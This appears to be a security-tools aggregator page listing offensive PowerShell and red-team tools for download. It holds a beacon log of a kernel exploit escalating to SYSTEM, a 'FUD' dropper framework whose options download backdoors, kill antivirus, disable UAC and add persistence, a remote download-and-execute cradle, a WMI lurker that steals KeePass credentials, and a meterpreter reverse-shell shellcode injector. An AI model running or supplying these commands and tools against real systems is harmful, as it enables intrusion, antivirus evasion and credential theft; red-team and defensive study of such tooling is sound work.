Adblock Detected

Windows Event Log Killer - Invoke-Phant0m

Read

Tool to simulate fake processes of analysis sandbox/VM software - Fake Sandbox Processes (FSP)

Read

This small script will simulate fake processes of analysis, sandbox and/or VM software that some malware will try to avoid. You can download the original script (made by @x0rz ) in the orig directory.

You can also download my slightly optimized script in the main directory. The file is named fsp.ps1.

Script-Features

Some (good) spyware will stop spying on you as long as the processes run, which are created by this script.
Requirements: Powershell (preinstalled on Win 7 and newer)
Runs on every Windows since Vista
Tiny size
No CPU load
Easy to use
No network connection required

Installer-Features

Automatically install the script to your autostart directory
Extremely easy to install
Uninstaller to purge all files
NO requirements
Tiny size
Offline package
Automatic updater included - only if you want!

Usage:
Open the command line and paste this command (don't forget to adjust the path!):

Powershell -executionpolicy remotesigned -File "Your\Path\fsp.ps1"

After pressing ENTER you will be asked to either start or stop all processes.

Autostart
If you execute the powershell script with the above command, you will have to rerun it after every login or startup. In order to autostart the script I made an easy-to-use installer.

Download the fsp-installer.bat file from the release section.
Double-click it.
Now you will see this cmd window:

Choose "i" to start the installer.
Now enter "y" to start installing or "n" to abort.
If you entered "y" this image will now pop up:

Enter "y" to install the auto-updater or "n" to not install it (it'll work anyways, but it is recommended to install the updater).

You can now close the window or press any key to close it. The (un)installation is complete.

Uninstall
If you no longer want this program on your computer, you'll need the fsp-installer.bat file again. Run it and chose "u" to start the uninstallation process. Then enter "y" if you are ready to uninstall it.

If the process was successful, you'll see a confirmation screen.

Successfully tested on the following Windows versions:

Win 10 Professional
Win 8.1 Home
Win 7 Professional

Download Fake Sandbox Processes

PowerShell Remote Download Cradle Generator and Obfuscator - Invoke-CradleCrafter

Read

Invoke-CradleCrafter is a PowerShell v2.0+ compatible PowerShell remote download cradle generator and obfuscator.

Purpose

Invoke-CradleCrafter exists to aid Blue Teams and Red Teams in easily exploring, generating and obfuscating PowerShell remote download cradles. In addition, it helps Blue Teams test the effectiveness of detections that may work for output produced by Invoke-Obfuscation but may fall short when dealing with Invoke-CradleCrafter since it does not contain any string concatenations, encodings, tick marks, type casting, etc.

Another important component of this research and tool development was to effectively highlight the high-level behavior and artifacts left behind when each cradle is executed. I have tried to highlight this information when you first enter a new cradle type in the interactive menus of the tool.

Ultimately, knowing more about each cradle's behavior and artifacts will help the Blue Team better detect these cradles. This knowledge should also benefit the Red Teamer in making more informed selections of which cradle to use in a given scenario.

Usage

While all of the cradles can be produced by directly calling the Out-Cradle function, the complexity of the moving pieces for all of the stacked obfuscated components makes using the Invoke-CradleCrafter function the easiest way to explorer and visualize the cradle syntaxes and obfuscation techniques that this framework currently supports.

Installation

The source code for Invoke-CradleCrafter is hosted at Github, and you may download, fork and review it from the repository. Please report issues or feature requests through Github's bug tracker associated with this project.

To install:

Import-Module ./Invoke-CradleCrafter.psd1
Invoke-CradleCrafter

Release Notes
v1.0 - 2017-04-28 x33fcon (Gdynia, Poland): PUBLIC Release of Invoke-CradleCrafter.
v1.1 - 2017-05-11 NOPcon (Istanbul, Turkey): Added 3 new memory-based cradles:

PsComMsXml
PsInlineCSharp
PsCompiledCSharp Added 2 disk-based cradles:
PsBits
BITSAdmin

Download Invoke-CradleCrafter

Microsoft PowerShell Module to Find HoneyPots and HoneyTokens in the Network - HoneypotBuster

Read

Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host.

CodeExecution
Execute code on a target machine using Import-Module.

Invoke-HoneypotBuster
HoneypotBuster is a tool designed to spot Honey Tokens, Honey Bread Crumbs, and Honey Pots used by common Distributed Deception vendors. This tool will help spot the following deception techniques:

1. Kerberoasting Service Accounts Honey Tokens

Just like the one described in the ADSecurity article by Sean Metcalf, this tricks attackers to scan for Domain Users with assigned SPN (Service Principal Name) and {adminCount = 1} LDAP Attribute flag. So when you try to request TGS for that user, you’ll be exposed as Kerberoasting attempt. TGS definition: A ticket granting server (TGS) is a logical key distribution center (KDC) component that is used by the Kerberos protocol as a trusted third party.

2. Fake Computer Accounts Honey Pots

Creating many domain computer objects with no actual devices associated to them will result in confusion to any attacker trying to study the network. Any attempt to perform lateral movement into these fake objects will lead to exposure of the attacker.

3. Fake Credentials Manager Credentials Breadcrumbs

Many deception vendors are injecting fake credentials into the “Credentials Manager”. These credentials will also be revealed using tools such as Mimikatz. Although they aren’t real, attackers might confuse them as authentic credentials and use them.

4. Fake Domain Admins Accounts Honey Tokens

Creating several domain admins and their credentials who have never been active is bad policy. These Honey Tokens lure attackers to try brute-forcing domain admin credentials. Once someone tries to authenticate to this user, an alarm will be triggered, and the attacker will be revealed. Microsoft ATA uses this method.

5. Fake Mapped Drives Breadcrumbs

Many malicious automated scripts and worms are spreading via SMB Shares, especially if they’re mapped as Network Drive Share. This tool will try to correlate some of the data collected before to identify any mapped drive related to a specific Honey Pot server.

6. DNS Records Manipulation HoneyPots

One of the methods deception vendors use to detect fake endpoints is registering their DNS records towards the Honey Pot Server. They will then be able to point the attacker directly to their honey pot instead of actual endpoints.

Usage

To install any of these modules, drop the PowerShell scripts into a directory and type

Import-Module PathTo\scriptName.ps1

Then run the Module from the Powershell.
Refer to the comment-based help in each individual script for detailed usage information.

Download HoneypotBuster

Powershell C2 Server and Implants - PoshC2

Read

Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities - Sherlock

Read

PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.

Currently looks for:

MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : 'mrxdav.sys' WebDAV
MS16-032 : Secondary Logon Handle

Tested on:

Windows 7 SP1 32-bit
Windows 7 SP1 64-bit
Windows 8 64-bit
Windows 10 64-bit

Basic Usage:

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

Download Sherlock

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2

Read

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

Framework works with Windows and Linux
Download executable on target system and execute it silently..
The executable size small compared to other droppers generated the same way
Self destruct function so that the dropper will kill and delete itself after finishing it work
Adding executable after downloading it to startup
Adding executable after downloading it to task scheduler ( UAC not matters )
Finding and killing the antivirus before running the malware
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
The ability to disable UAC
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

Python libraries requirements in requirements.txt

Needed dependencies for linux

Wine
Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Tested on:

Kali Linux - SANA
Ubuntu 14.04-16.04 LTS
Windows 10/8.1/8

Changelog v1.2

Pyinstaller compiling in Linux using wine
Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
Added the ability to disable and bypass UAC
Updated the antivirus list in the antivirus killer
Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work
Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

Download Dr0p1t-Framework

Malicious WMI Events using PowerShell - PowerLurk

Read

PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:

Import locally

    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1

Download Cradle

    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http:///PowerLurk.ps1'); Get-WmiEvent"

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent'

    Get-WmiEvent -Name RedTeamEvent

Delete 'RedTeamEvent' WMI event objects

    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts

    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe

Cleanup Malicious WMI Event

    Get-WmiEvent -Name LogNotepad | Remove-WmiObject

Add-KeeThiefLurker
creates a permanent WMI event that will execute KeeThief (See @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief ) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage

    Add-KeeThiefLurker -EventName KeeThief -WMI

Query custom WMI class

    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List

Extract KeeThief output from WMI class

    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))

Cleanup KeeThiefLurker

    Remove-KeeThiefLurker -EventName KeeThief -WMI

Download PowerLurk

The Need for Instrumentation

Read

Unicorn - Tool for using a PowerShell downgrade attack and inject shellcode straight into memory

Read

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.

root@bt:~/Desktop# python unicorn.py
                                                     ,/
                                                    //
                                                  ,//
                                      ___   /|   |//
                                  `__/\_ --(/|___/-/
                               \|\_-\___ __-_`- /-/ \.
                              |\_-___,-\_____--/_)' ) \
                               \ -_ /     __ \( `( __`\|
                               `\__|      |\)\ ) /(/|
       ,._____.,            ',--//-|      \  |  '   /
      /     __. \,          / /,---|       \       /
     / /    _. \  \        `/`_/ _,'        |     |
    |  | ( (  \   |      ,/\'__/'/          |     |
    |  \  \`--, `_/_------______/           \(   )/
    | | \  \_. \,                            \___/\
    | |  \_   \  \                                 \
    \ \    \_ \   \   /                             \
     \ \  \._  \__ \_|       |                       \
      \ \___  \      \       |                        \
       \__ \__ \  \_ |       \                         |
       |  \_____ \  ____      |                        |
       | \  \__ ---' .__\     |        |               |
       \  \__ ---   /   )     |        \              /
        \   \____/ / ()(      \          `---_       /|
         \__________/(,--__    \_________.    |    ./ |
           |     \ \  `---_\--,           \   \_,./   |
           |      \  \_ ` \    /`---_______-\   \\    /
            \      \.___,`|   /              \   \\   \
             \     |  \_ \|   \              (   |:    |
              \    \      \    |             /  / |    ;
               \    \      \    \          ( `_'   \  |
                \.   \      \.   \          `__/   |  | 
                  \   \       \.  \                |  |
                   \   \        \  \               (  )
                    \   |        \  |              |  |
                     |  \         \ \              I  `
                     ( __;        ( _;            ('-_';
                     |___\        \___:            \___:

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage:

python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download Unicorn

Antak WebShell - A webshell which utilizes PowerShell

Read

[PoshSec Framework v0.2] Graphical Interface for Powershell scripts

Read